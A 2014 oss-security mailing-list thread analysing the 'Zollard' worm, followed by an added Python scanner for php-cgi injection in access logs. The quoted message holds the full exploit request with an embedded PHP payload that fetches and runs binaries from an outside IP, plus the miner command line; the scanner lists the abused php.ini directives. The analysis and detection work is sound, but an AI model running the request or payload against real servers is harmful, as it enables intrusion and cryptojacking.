Date: Fri, 10 Oct 2014 21:55:06 +0200
From: Pierre Schweitzer <pierre@...ctos.org>
To: oss-security@...ts.openwall.com
Subject: Re: What does this PHP exploit do?

Dear Dave,

Going quickly through the PHP script shows that it downloads lots of
executables for various architectures and then tries to run them (hence
the chmod +x) on the host it was downloaded to. So it is a pretty portable worm.

The executable it downloads appears to have two basic functions:
-> replicating itself over the network
-> starting a cryptocurrency miner (CPU miner) on the infected host

Here is the way it starts the miner:
./minerd -q -B -a scrypt -o http://p2pool.org:5643 -u
MDFepZz9SpSbFSugUsXVE3CmrdTaKg1SWi -p pass

Cheers,
Pierre

On 10/10/2014 21:28, Dave Horsfall wrote:
> My apologies if this is off-topic for this list, but out of all the
> security lists of which I am a member this seems to be the closest
> one that fits, so please point me to a more appropriate one in that
> case.
> 
> I'm trying to figure out what this exploit does; it started around
> the time that Shellshock did, but I don't think that they're
> related.
> 
> It downloads binaries for several architectures (even a MIPS) which
>  amongst other things futzes around with IPTABLES (including
> blocking the TELNET port) and appears to be self-reproducing.
> 
> The hex-encoded stuff in the script below decodes to
> 
> "-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n"
> 
> 
> but my PHP-fu doesn't quite extend that far (and that
> "safe_mode=off" looks a bit suss).
> 
> Script below, kindly supplied by 0wned boxes the world over (in
> this case, Korea):
> 
> POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
> Host: xxx.xxx.xxx.xxx
> User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 1817
> Connection: close
> 
> <?php
> echo "Zollard";
> $disablefunc = @ini_get("disable_functions");
> if (!empty($disablefunc)) {
>     $disablefunc = str_replace(" ","",$disablefunc);
>     $disablefunc = explode(",",$disablefunc);
> }
> function myshellexec($cmd) {
>     global $disablefunc;
>     $result = "";
>     if (!empty($cmd)) {
>         if (is_callable("exec") and !in_array("exec",$disablefunc)) {
>             exec($cmd,$result); $result = join("\n",$result);
>         } elseif (($result = `$cmd`) !== FALSE) {
>         } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
>             $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
>         } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
>             $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
>         } elseif (is_resource($fp = popen($cmd,"r"))) {
>             $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
>         }
>     }
>     return $result;
> }
> myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://119.206.52.15:58455/armeabi;chmod +x /tmp/armeabi");
> myshellexec("rm -rf /tmp/arm;wget -P /tmp http://119.206.52.15:58455/arm;chmod +x /tmp/arm");
> myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://119.206.52.15:58455/ppc;chmod +x /tmp/ppc");
> myshellexec("rm -rf /tmp/mips;wget -P /tmp http://119.206.52.15:58455/mips;chmod +x /tmp/mips");
> myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://119.206.52.15:58455/mipsel;chmod +x /tmp/mipsel");
> myshellexec("rm -rf /tmp/x86;wget -P /tmp http://119.206.52.15:58455/x86;chmod +x /tmp/x86");
> myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://119.206.52.15:58455/nodes;chmod +x /tmp/nodes");
> myshellexec("rm -rf /tmp/sig;wget -P /tmp http://119.206.52.15:58455/sig;chmod +x /tmp/sig");
> myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
>
>  -- Dave
> 


-- 
Pierre Schweitzer <pierre at reactos.org>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.
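The request quoted in the thread works by smuggling php-cgi command-line switches through the query string, so the defensive check is on the web server side: decode the request target and flag any `-d` override of php.ini directives such as `allow_url_include` or `auto_prepend_file=php://input`. The following log scanner is an added example, not code from the thread; the access-log lines it scans are constructed (documentation-range IPs, a shortened variant of the quoted payload) and the directive list is an assumption drawn from the decoded string in Dave's message. It also handles the combined `-dname=value` spelling, which the quoted request does not use.

```python
"""Flag php-cgi argument-injection attempts in web access logs (added example)."""
import re
from urllib.parse import unquote_plus

# php.ini directives the quoted request overrides; a '-d' naming any of them
# in a query string is hostile on a php-cgi endpoint (assumed list).
SUSPICIOUS_DIRECTIVES = {
    "allow_url_include", "safe_mode", "suhosin.simulation", "disable_functions",
    "open_basedir", "auto_prepend_file", "cgi.force_redirect",
    "cgi.redirect_status_env",
}

# Request line inside a Combined Log Format entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample: one benign hit and one probe using the thread's payload shape.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2014:21:28:00 +0200] "GET /cgi-bin/php?page=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2014:21:28:01 +0200] "POST /cgi-bin/php?%2D%64+allow_url_include%3Don'
    '+%2D%64+auto_prepend_file%3Dphp%3A%2F%2Finput+%2D%6E HTTP/1.1" 200 17 "-" '
    '"Mozilla/5.0 (compatible; Zollard; Linux)"',
]

def decode_query(target):
    """Return the percent-decoded query string of a request target ('' if none)."""
    _, sep, query = target.partition("?")
    return unquote_plus(query) if sep else ""

def php_cgi_directives(query):
    """Extract directive names passed as '-d name=value' or '-dname=value' tokens."""
    tokens = query.split()
    names = []
    for i, tok in enumerate(tokens):
        if tok == "-d" and i + 1 < len(tokens):
            names.append(tokens[i + 1].split("=", 1)[0])
        elif tok.startswith("-d") and len(tok) > 2:
            names.append(tok[2:].split("=", 1)[0])
    return names

def is_php_cgi_injection(target):
    """True when the query string tries to reconfigure the interpreter."""
    query = decode_query(target)
    names = set(php_cgi_directives(query))
    return bool(names & SUSPICIOUS_DIRECTIVES) or "php://input" in query

def scan_log(lines):
    """Return the log entries whose request target carries php-cgi switches."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and is_php_cgi_injection(m.group("target")):
            hits.append(line)
    return hits
```

Run `scan_log(SAMPLE_LOG)` to see only the second entry returned; the same functions apply unchanged to a real access log read line by line.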
